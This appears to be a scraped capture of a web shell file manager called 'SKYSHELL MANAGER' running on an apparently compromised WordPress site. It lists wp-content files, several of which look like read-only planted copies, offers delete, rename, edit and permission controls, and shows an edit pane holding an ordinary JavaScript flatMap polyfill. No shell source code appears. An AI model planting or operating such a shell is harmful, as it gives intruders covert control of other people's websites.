📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: implementation.js
'use strict'; var ArraySpeciesCreate = require('es-abstract/2021/ArraySpeciesCreate'); var FlattenIntoArray = require('es-abstract/2021/FlattenIntoArray'); var Get = require('es-abstract/2021/Get'); var IsCallable = require('es-abstract/2021/IsCallable'); var ToLength = require('es-abstract/2021/ToLength'); var ToObject = require('es-abstract/2021/ToObject'); module.exports = function flatMap(mapperFunction) { var O = ToObject(this); var sourceLen = ToLength(Get(O, 'length')); if (!IsCallable(mapperFunction)) { throw new TypeError('mapperFunction must be a function'); } var T; if (arguments.length > 1) { T = arguments[1]; } var A = ArraySpeciesCreate(O, 0); FlattenIntoArray(A, O, sourceLen, 0, 1, mapperFunction, T); return A; };
Save